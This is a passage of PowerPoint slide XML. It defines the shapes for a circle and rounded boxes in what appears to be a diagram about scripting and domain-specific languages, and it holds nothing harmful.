                    <a:pt x="590559" y="1769783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634211" y="1785061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678839" y="1798162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724379" y="1809023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770768" y="1817580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817944" y="1823771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865842" y="1827532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962957" y="1827532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010855" y="1823771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1058031" y="1817580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104420" y="1809023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149960" y="1798162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194588" y="1785061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238240" y="1769783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280854" y="1752391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322365" y="1732948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362711" y="1711518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401828" y="1688164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439653" y="1662950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476124" y="1635937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511176" y="1607190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544746" y="1576772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576772" y="1544746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607190" y="1511176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1635937" y="1476124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662950" y="1439653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688164" y="1401828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711518" y="1362711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732948" y="1322365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752391" y="1280854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769783" y="1238240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785061" y="1194588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798162" y="1149960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809023" y="1104420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817580" y="1058031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823771" y="1010855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827532" y="962957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827532" y="865842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823771" y="817944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817580" y="770768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809023" y="724379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798162" y="678839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785061" y="634211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769783" y="590559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752391" y="547945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732948" y="506434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711518" y="466088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688164" y="426971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662950" y="389146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1635937" y="352675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607190" y="317623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576772" y="284053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544746" y="252027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511176" y="221609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476124" y="192862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439653" y="165849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401828" y="140635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362711" y="117281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322365" y="95851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280854" y="76408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238240" y="59016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194588" y="43738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149960" y="30637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104420" y="19776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1058031" y="11219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010855" y="5028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962957" y="1267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381493" y="3992117"/>
              <a:ext cx="1828800" cy="1828800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1828800" h="1828800">
                  <a:moveTo>
                    <a:pt x="0" y="914400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1267" y="865842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5028" y="817944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11219" y="770768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19776" y="724379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30637" y="678839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43738" y="634211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59016" y="590559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76408" y="547945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95851" y="506434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117281" y="466088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140635" y="426971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165849" y="389146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192862" y="352675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221609" y="317623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252027" y="284053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284053" y="252027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317623" y="221609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352675" y="192862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389146" y="165849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426971" y="140635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466088" y="117281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506434" y="95851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547945" y="76408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590559" y="59016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634211" y="43738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678839" y="30637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724379" y="19776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770768" y="11219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817944" y="5028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865842" y="1267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962957" y="1267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010855" y="5028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1058031" y="11219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104420" y="19776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149960" y="30637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194588" y="43738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238240" y="59016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280854" y="76408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322365" y="95851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362711" y="117281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401828" y="140635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439653" y="165849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476124" y="192862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511176" y="221609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544746" y="252027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576772" y="284053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607190" y="317623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1635937" y="352675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662950" y="389146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688164" y="426971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711518" y="466088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732948" y="506434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752391" y="547945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769783" y="590559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785061" y="634211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798162" y="678839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809023" y="724379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817580" y="770768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823771" y="817944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827532" y="865842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827532" y="962957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823771" y="1010855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817580" y="1058031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809023" y="1104420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798162" y="1149960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785061" y="1194588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769783" y="1238240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1752391" y="1280854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732948" y="1322365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711518" y="1362711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1688164" y="1401828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662950" y="1439653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1635937" y="1476124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607190" y="1511176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576772" y="1544746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544746" y="1576772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511176" y="1607190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476124" y="1635937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439653" y="1662950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1401828" y="1688164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362711" y="1711518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322365" y="1732948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280854" y="1752391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238240" y="1769783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194588" y="1785061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1149960" y="1798162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104420" y="1809023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1058031" y="1817580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010855" y="1823771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962957" y="1827532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914400" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865842" y="1827532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817944" y="1823771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770768" y="1817580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724379" y="1809023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678839" y="1798162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634211" y="1785061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590559" y="1769783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547945" y="1752391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506434" y="1732948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466088" y="1711518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426971" y="1688164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389146" y="1662950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352675" y="1635937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317623" y="1607190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284053" y="1576772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252027" y="1544746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221609" y="1511176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192862" y="1476124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165849" y="1439653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140635" y="1401828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117281" y="1362711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95851" y="1322365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76408" y="1280854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59016" y="1238240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43738" y="1194588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30637" y="1149960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19776" y="1104420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11219" y="1058031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5028" y="1010855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1267" y="962957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="914400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2540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11083" y="4575047"/>
              <a:ext cx="768096" cy="768096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2731261" y="3551173"/>
            <a:ext cx="4257675" cy="880744"/>
            <a:chOff x="2731261" y="3551173"/>
            <a:chExt cx="4257675" cy="880744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743961" y="3563873"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="4089654" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654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743961" y="3563873"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="142493"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232147" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2540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3581780" y="3795776"/>
            <a:ext cx="255397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riptin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lan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uages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604502" y="3551173"/>
            <a:ext cx="4257675" cy="880744"/>
            <a:chOff x="9604502" y="3551173"/>
            <a:chExt cx="4257675" cy="880744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9617202" y="3563873"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="4089654" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654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617202" y="3563873"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="142493"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4232148" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224887" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4204667" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4173827" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4134709" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2540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9981692" y="3797300"/>
            <a:ext cx="350329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Domai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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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specif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lan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uages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731261" y="5379973"/>
            <a:ext cx="4257675" cy="880744"/>
            <a:chOff x="2731261" y="5379973"/>
            <a:chExt cx="4257675" cy="880744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743961" y="5392673"/>
              <a:ext cx="4232275" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4232275" h="855345">
                  <a:moveTo>
                    <a:pt x="4089654" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142494" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="7260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="27480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="58320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="97438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="712469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="757525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27480" y="796643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58320" y="827483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97438" y="847703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4089654" y="854963"/>
                  </a:lnTo>
